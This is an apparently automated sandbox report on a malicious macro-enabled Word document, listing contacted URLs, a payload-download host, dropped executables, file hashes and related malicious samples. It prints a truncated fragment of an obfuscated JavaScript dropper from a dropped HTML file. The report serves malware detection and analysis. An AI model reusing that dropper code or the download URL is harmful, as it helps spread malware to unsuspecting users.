http://investor.msn.com	ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	ms.com, 00000002.00000002.2341187332.0000000003A90000.00000002.00000001.sdmp	false		high
http://nfj254aim.com/analytics/0	ms.com, 00000002.00000003.2087841762.0000000002CD8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	false		high
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw	ms.com, 00000002.00000002.2339235890.000000000057E000.00000004.00000020.sdmp, ms.com, 00000002.00000002.2342286251.00000000042E0000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	ms.com, 00000002.00000002.2341187332.0000000003A90000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.28.7.227	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	326338
Start date:	03.12.2020
Start time:	10:17:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	documenti 12.01.20.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.expl.winDOC@2/13@2/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 4% (good quality ratio 2.3%) Quality average: 50.6% Quality standard deviation: 46.6%
HCA Information:	Successful, ratio: 59% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:17:36	API Interceptor	882x Sleep call for process: ms.com modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
nfj254aim.com	documenti 12.01.20.doc	Get hash	malicious	Browse	172.67.164.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	AT113020.exe	Get hash	malicious	Browse	162.159.134.233
	documenti 12.01.20.doc	Get hash	malicious	Browse	104.28.6.227
	documenti 12.01.20.doc	Get hash	malicious	Browse	172.67.164.220
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.122.135
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.122.135
	officialdoc!_013_2020.exe	Get hash	malicious	Browse	104.24.126.89
	https://tvronline.com/ihs	Get hash	malicious	Browse	104.16.123.96
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.123.135
	2020-12-03_08-45-45.exe.exe	Get hash	malicious	Browse	104.31.70.85
	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.130.233
	invoice.xlsx	Get hash	malicious	Browse	172.67.143.180
	Vlpuoe2JSz.exe	Get hash	malicious	Browse	23.227.38.74
	MxL5EoQS5q.exe	Get hash	malicious	Browse	104.27.146.3
	imVtKjcvlb.exe	Get hash	malicious	Browse	172.67.146.58
	Quote.exe	Get hash	malicious	Browse	172.67.188.154
	doc-3860.xls	Get hash	malicious	Browse	104.31.87.226
	LIST_OF_IDs.xls	Get hash	malicious	Browse	104.22.1.232
	niteEnrgy.xlsx	Get hash	malicious	Browse	162.159.134.233
	Shipment Document BL,INV and packing list.jpg.exe	Get hash	malicious	Browse	23.227.38.74
	info1270.xls	Get hash	malicious	Browse	104.28.11.60

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\Public\ms.com	documenti 12.01.20.doc	Get hash	malicious	Browse
	dettare-12.01.2020.doc	Get hash	malicious	Browse
	dettare-12.01.2020.doc	Get hash	malicious	Browse
	legal paper-12.01.2020.doc	Get hash	malicious	Browse
	legal paper-12.01.2020.doc	Get hash	malicious	Browse
	statistics,11.20.2020.doc	Get hash	malicious	Browse
	statistics,11.20.2020.doc	Get hash	malicious	Browse
	commerce _11.20.2020.doc	Get hash	malicious	Browse
	commerce _11.20.2020.doc	Get hash	malicious	Browse
	file-11.20.doc	Get hash	malicious	Browse
	file-11.20.doc	Get hash	malicious	Browse
	inquiry-010.14.2020.doc	Get hash	malicious	Browse
	direct_010.20.doc	Get hash	malicious	Browse
	command-11.05.2020.doc	Get hash	malicious	Browse
	command-11.05.2020.doc	Get hash	malicious	Browse
	input 11.20.doc	Get hash	malicious	Browse
	official paper_11.20.doc	Get hash	malicious	Browse
	legal agreement 11.20.doc	Get hash	malicious	Browse
	specifics 11.05.2020.doc	Get hash	malicious	Browse
	particulars,11.20.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xspcd2[1].htm Download File
Process:	C:\Users\Public\ms.com
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	205
Entropy (8bit):	5.155240244937957
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
MD5:	6C598B85477C948D2A6C50AB26631415
SHA1:	429CE2C54B01450B0250D423F08886A0F6B567DB
SHA-256:	04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
SHA-512:	9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
Malicious:	false
Reputation:	low
IE Cache URL:	http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6146FF6.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	[TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=Paint.NET v3.5.11], baseline, precision 8, 994x241, frames 3
Category:	dropped
Size (bytes):	57258
Entropy (8bit):	7.900983242117529
Encrypted:	false
SSDEEP:	768:Nne7FOQKYij8iCi2EQrb4lF6j5UTFRHehGLOAFed/6CO2wPbttab/jz7Q+6fNsaw:Ne7Il+Oy4wUOAL2wPbnQ/Tz6CaCd
MD5:	B44AC26E80A557B913B715F234C3D769
SHA1:	1E0574649A9E5BBE0283D83A801E0E3EC4261BBC
SHA-256:	1EFAC6DE241D24814D7925C803E3ACBF4E2CD4A90FDE9C6826613DE2A8063B7B
SHA-512:	4349E729AEDC4E69A92432553C0BEA8CF5D4D92E7908F25DB5DF3E1B3628F74D362AFD15AED5EED12E53ABDFFAB44F81E39006C8C6FF4D242A05D45AFFA08E5D
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....hExif..MM..................>...........F.(...........1.........N.......`.......`....Paint.NET v3.5.11....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......C@.9.cJ9.b.....^..e...G..~.vP/...]f...Zh.....1y.7.%R5'v.WE..@..J.N....V....9.e...$a....R..R..{...........).......O.\|<.-bR.>..^.F[$a........... ....r.../.....?.._.....'.7A+.r...3..Yj..o.'o....=)k......?..8.._....K................g....8...e\...e.(...q..1.2.W.3...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{56C17754-AEE2-4FF8-BAE6-F2A3ACFA1DAD}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:X:X
MD5:	32649384730B2D61C9E79D46DE589115
SHA1:	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256:	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512:	A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C07723-97C0-4A14-814E-1968BCE52029}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FDB545E2-A1F4-4D0B-9DE9-98A3C665B689}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.3796147056131488
Encrypted:	false
SSDEEP:	3:9l3lli4wltfSP8lFllItEMAWuWy:kFSP8gtEMAWpy
MD5:	39F0255F9BB41BD49E765898D326FB77
SHA1:	8AD67EEB7CF2ED4CA7DD1AF586406DE92113C6F1
SHA-256:	7DB4A7FAFE19900A941F5EC134454C4769D6D1F8227A176A3CEBD9F3C7D86056
SHA-512:	6FD2E6037C25B4EC5D091B9E2C3F2E9EC04FC3A59AFD79D980ED0E11FFEEFBA18EA535B1C0443A01BC50C5AED4C4F1150B0487B89CE35B2B440D323B40592B28
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....../.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp.tmp Download File
Process:	C:\Users\Public\ms.com
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.155240244937957
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
MD5:	6C598B85477C948D2A6C50AB26631415
SHA1:	429CE2C54B01450B0250D423F08886A0F6B567DB
SHA-256:	04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
SHA-512:	9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documenti 12.01.20.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Dec 3 17:17:34 2020, length=93665, window=hide
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	4.53050326276553
Encrypted:	false
SSDEEP:	24:8e/XTwz6Ikns4eNHDv3q6idM7dD2e/XTwz6Ikns4eNHDv3q6idM7dV:8e/XT3IknGGtQh2e/XT3IknGGtQ/
MD5:	339996F2DA09C87A7FEEC06238EE2785
SHA1:	A2715809849265F507EE2EFCDED0DDBE36881E80
SHA-256:	92F6B1A65E873BF8F6C7D7E2B6229992956C8F96217DE3CC95A351515EE09716
SHA-512:	6859674992F695DFEB10ACD08673DDDA17D6491A3994D28BC58988BC38C9FF2A3252AE5A6508436AD6FBB3083EA3CFDD389151553D07975E788AAACD46AC8612
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...s....{..s....{..^.e......m...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..m...Q2. .DOCUME~1.DOC..Z.......Q.y.Q.y...8.....................d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\documenti 12.01.20.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.323234076376603
Encrypted:	false
SSDEEP:	3:M18H9LRB/ZELRB/mX18H9LRB/v:M+H9LxELLH9L3
MD5:	51CD26B6AD58A57E3117C7891A2E898A
SHA1:	118C0F24D024CEF1CED16EACA93A556CAE82C721
SHA-256:	A2C3E26D19A5762331B519B63FE654F184C7662D14132C55E7A3594110066FDC
SHA-512:	3096AE1E0C209244F7123FA025CE8F45594B3C195BE6325495DDFA6D60936B0E21066F6783D0B2022DD52400A95DE2EF783BAFA04F9EA437669CB836945CDFDF
Malicious:	false
Reputation:	low
Preview:	[doc]..documenti 12.01.20.LNK=0..documenti 12.01.20.LNK=0..[doc]..documenti 12.01.20.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VPKC7C2S.txt Download File
Process:	C:\Users\Public\ms.com
File Type:	ASCII text
Category:	downloaded
Size (bytes):	114
Entropy (8bit):	4.318379508048024
Encrypted:	false
SSDEEP:	3:GmM/yWEYnNMqftzVSF/Av2KlSNLIXD:XM/yWEYNjz41Av2KlvD
MD5:	2A1065E0A209B7FD54D663FCBE2FD54E
SHA1:	F50FA87FDF5F98376986FD80FDEBEAC159AA5AA0
SHA-256:	E3DCC882B10C89BB9F9565AA4844B1BA3363E8C7337D37FDACB18222510A7EB1
SHA-512:	365C09C0CF69DB41FAA189923BD091F8A9D2607626E296D10BD31FA1942BC2693C514B19CCA1C5D177782EC499898C6B68F79C3F25DFECE027FFCEC038C92CF4
Malicious:	false
IE Cache URL:	nfj254aim.com/
Preview:	__cfduid.d22f56ec96c6f03715d1ce936958387bc1606987070.nfj254aim.com/.9728.608957184.30859496.2493225696.30853536.*.

C:\Users\user\Desktop\~$cumenti 12.01.20.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\Public\ms.com Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	4.419080301347865
Encrypted:	false
SSDEEP:	192:aQNrOJPtfF4xtpOZ4UlT7phhbPWwelJIR:3yFu6CUlT7hWw6
MD5:	95828D670CFD3B16EE188168E083C3C5
SHA1:	83C70C66CD4E971BE2E36EFDC27FBCB7FF289032
SHA-256:	8C10AE4BE93834A4C744F27CA79736D9123ED9B0D180DB28556D2D002545BAF2
SHA-512:	22BE50366CF57FD3507760122CCAA3D74E6A137C2D46377597284D62762BFCA740BED71DDC4ECA60E4BA81055EB3D1BDE34AF382A2C4587BA9335D670D7F3B2E
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: documenti 12.01.20.doc, Detection: malicious, Browse Filename: dettare-12.01.2020.doc, Detection: malicious, Browse Filename: dettare-12.01.2020.doc, Detection: malicious, Browse Filename: legal paper-12.01.2020.doc, Detection: malicious, Browse Filename: legal paper-12.01.2020.doc, Detection: malicious, Browse Filename: statistics,11.20.2020.doc, Detection: malicious, Browse Filename: statistics,11.20.2020.doc, Detection: malicious, Browse Filename: commerce _11.20.2020.doc, Detection: malicious, Browse Filename: commerce _11.20.2020.doc, Detection: malicious, Browse Filename: file-11.20.doc, Detection: malicious, Browse Filename: file-11.20.doc, Detection: malicious, Browse Filename: inquiry-010.14.2020.doc, Detection: malicious, Browse Filename: direct_010.20.doc, Detection: malicious, Browse Filename: command-11.05.2020.doc, Detection: malicious, Browse Filename: command-11.05.2020.doc, Detection: malicious, Browse Filename: input 11.20.doc, Detection: malicious, Browse Filename: official paper_11.20.doc, Detection: malicious, Browse Filename: legal agreement 11.20.doc, Detection: malicious, Browse Filename: specifics 11.05.2020.doc, Detection: malicious, Browse Filename: particulars,11.20.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.]..............<.......>.......=.......8............... .......:.......?.....Rich............PE..d...w.[R.........."..........(.................@....................................9b....`.................................................xA..P....P.......0...............p......@...............................`................@..x............................text............................... ..`.data........ ......................@....pdata.......0......................@..@.idata..j....@......................@..@.rsrc........P....... ..............@..@.reloc..b....p.......4..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\ms.html Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17904
Entropy (8bit):	5.221943493256307
Encrypted:	false
SSDEEP:	192:eBZQiLCb1hint4zdt1e870k0hs70k0C2qNXl6qJExTxvYj0lXUZIeYsa3UKh73uy:e3QYnadWs4TxYI2ZHeM7MQc
MD5:	7F908F1EE0BBB0B276589F06368A008D
SHA1:	EE9D0FA4C45AEB9C75750AA003E7C0F0F22E348D
SHA-256:	8B23A9189FD2FE4CC89459224ED36E7A64121DE9589D3AC9CEAE9E4DEEF7F23A
SHA-512:	3FBEBBCD1B5F2A731470037A702BA58EEFBC0764874D465539E90B6FCD4BA16E93221E8EB402BF2D3B603A6B4D81E3B1A2E68EA3625A93716F4EF991FA625633
Malicious:	false
Preview:	<html>..<body>..<script language="javascript">..var a3MQw4 = true;..var a3yaLo = -47909;..function decode(input)..{..var keystr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";..var output = "";..var chr1, chr2, chr3;..var enc1, enc2, enc3, enc4;..var i = 0;..input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");..while (i < input.length)..{..enc1 = keystr.indexOf(input.charAt(i++));..enc2 = keystr.indexOf(input.charAt(i++));..enc3 = keystr.indexOf(input.charAt(i++));..enc4 = keystr.indexOf(input.charAt(i++));..chr1 = (enc1 << 2) \| (enc2 >> 4);..chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2);..chr3 = ((enc3 & 3) << 6) \| enc4;..output = output + String.fromCharCode(chr1);..if(enc3 != 64)..{..output = output + String.fromCharCode(chr2);..}..if(enc4 != 64)..{..output = output + String.fromCharCode(chr3);..}..}..return(output);..}..var aVEqp = true;..var atpoA = "HKEY_CURRENT_USER\\Software\\aHgVT\\auJ5v2";..var a7PjY = "a9IlS";..var a4qgwu = a7PjY.length;..anD3Wb = true;..window

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.894769517768764
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99% Word Microsoft Office Open XML Format document (49504/1) 32.35% Word Microsoft Office Open XML Format document (43504/1) 28.43% ZIP compressed archive (8000/1) 5.23%
File name:	documenti 12.01.20.doc
File size:	93665
MD5:	f530de77053a5c25a94f930bb954bcf8
SHA1:	46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:	1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
SHA512:	f35b4d0cf4d0665117f58792a4d0fe51f13210921c1ac9d715160a4f9708e09817c6f0ab65e2c37c493a22d41fdacaaba1775fb8cc205b9d3e4855258892f916
SSDEEP:	1536:A/rBcK6fNcSI7O8hRe7Il+Oy4wUOAL2wPbnQ/Tz6CaC/B2RrNbSxQml:w6lfNu/Q7Y9wkFncTZB2RrN9S
File Content Preview:	PK..........!.[...............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Template:	Normal.dotm
Total Edit Time:	0
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Number of Lines:	3
Number of Paragraphs:	0
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1127
Data ASCII:	. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . s . . : . . \\ L . . # Y * . . . . . g ~ . . L . o . . . . . . . . . . . . . . . . . . . . . . . . . . ! } . . . . u D . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! } . . . . u D . 1 . . . . . . s . . : . . \\ L . . # Y * . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 0e 35 d7 f8 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 73 04 ec 3a 99 d0 5c 4c bb d7 23 59 2a 88 09 7f 14 fb 67 20 7e 8f de 4c 81 6f 96 90 b4 fc f3 9f 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
"ThisDocument"

VBA Code

VBA File Name: a7A5m.bas, Stream Size: 5178

General
Stream Path:	VBA/a7A5m
VBA File Name:	a7A5m.bas
Stream Size:	5178
Data ASCII:	. . . . . . . . . j . . . . . . . . . . . . . . . q . . . ] . . . . . . . . . . . . 5 > Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 6a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 71 03 00 00 5d 0e 00 00 00 00 00 00 01 00 00 00 0e 35 3e 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
joins
effigy
photo
maidenhead
torah
imprint
co-operative
unfavorable
Collects
Public
Diagram
aSGxU
Makeup
father
abhorred
controls
Cutting
unpropitious
minerva
Training
Adventures
unveil
Mysimon
Replace(aPENSZ,
slanderous
webcast
savoury
nucleus
liberia
footstool
Adroit
nutmeg
greenish
inter
adHaPl
Hallow
warner
manger
ethical
Since
pickled
Routing
Sniff
Giants
Nickel
seventy-four
fellowship
shadow
Maudlin
stefan
Tribal
tabooed
akSqK(aPENSZ)
expire
along
vaccine
reaction
Rancid
patricia
lackey
coxcomb
Workflow
axIuO
succeed
daisy
syria
Receptacle
Defraud
Knowledge
Contacts
Sorcery
transit
undersigned
leniency
sacrilegious
aYKyQ
dearborn
insulation
detecting
cloud
Glucose
willy
wealth
probity
exhort
Accelerated
ballast
Articulated
transverse
azUoN
Outcome
Specifies
graphic
brandishing
Attribute
gamespot
rectangular
patients
awAlq()
tumults
Enemies
Basketball
VB_Name
Gloating
(axSiN)
Issue
counterfeit
Function
Retrospect
